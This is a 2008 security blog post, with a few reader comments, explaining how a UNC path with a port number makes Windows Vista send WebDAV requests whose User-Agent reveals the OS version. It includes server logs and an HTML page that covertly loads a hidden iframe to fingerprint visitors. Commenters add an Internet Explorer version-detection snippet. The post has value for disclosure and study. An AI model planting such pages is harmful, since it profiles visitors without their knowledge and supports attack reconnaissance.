Monday, May 05, 2008

[ Vista OS Version Trick ]

I found out about this nifty little trick while messing around with UNC notation in the browser. For those wondering, I'll blog about the second day of Blue Hat some other time. Still mentally recovering from the limo races ;)


So, to start this out, I discovered something interesting about UNC notation. You can specify a port number. For example, if I did this in the browser:

\\1.2.3.4:80

It will actually try to connect to port 80, but it does some strange stuff when it tries that. Since Vista doesn't know exactly WHAT service is running on port 80 it will send a couple interesting requests to it. First it sends an OPTIONS HTTP request to that port. Then if it gets an intelligible response it will send some PROPFIND requests. Weird. Here are a couple examples of what it looks like from my Apache server logs:

8.7.6.5 - - [30/Apr/2008:16:35:23 -0500] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6000"

5.4.3.2 - - [29/Apr/2008:16:21:38 -0500] "PROPFIND / HTTP/1.0" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6001"

And here is an actual HTTP request:

PROPFIND / HTTP/1.1
Content-Length: 0
Depth: 0
translate: f
User-Agent: Microsoft-WebDAV-MiniRedir/6.0.6000
Host: 1.2.3.4
Proxy-Connection: Keep-Alive

The thing we want to focus on here is the User-Agent header. It invariably says "Microsoft-WebDAV-MiniRedir/" but the version number included after the slash differs depending on what version of Vista the user is running.


Version 6.0.6000 is Vista Ultimate with no service pack and 6.0.6001 is Vista Ultimate with SP1 installed. I haven't had a chance to test other versions. So if we have a page like this:

<html>
<script>
function f() {
document.getElementById("shady").innerHTML = "<iframe name='s' id='s' src='\\\\1.2.3.4:80' width='40%' height='300'>";
}
setTimeout('f()', 500);
</script>
<body>
Nothing shady going on here....<br><br>
<div id="shady"></div>
</body>
</html>

We can force them to give up their Vista version number just by visiting our page.


Obviously we can make the iframe invisible so the error message doesn't show up for the victim.

So this, in and of itself, is not a system compromising attack, but the more information we can glean from the target the more ammunition we have as attackers. By the way, this does not work in XP.

Labels: , , , , , , ,

5 Comments:

At 4:02 PM, Anonymous Anonymous said...

Grab your ankles, Vista. Nice trick.

Added your RSS to my feeds at https://kinqpinz.info/feeds/.

 
At 1:24 PM, Blogger Rob said...

Thanks meathive

 
At 10:23 AM, Anonymous Anonymous said...

<BODY behavior:url(#default#clientCaps)" ID="oClientCaps">

var sVersion = oClientCaps.getComponentVersion ("{89820200-ECBD-11CF-8B85-00AA005B4383}","componentid");
alert("getComponentVersion says you are running Internet Explorer " + sVersion + ".");

 
At 11:10 AM, Blogger Rob said...

Very cool, anonymous. I like that. One correction though:

<BODY style="behavior:url(#default#clientCaps)" ID="oClientCaps">

 
At 12:48 PM, Blogger est said...

nice trick!

 

Post a Comment

<< Home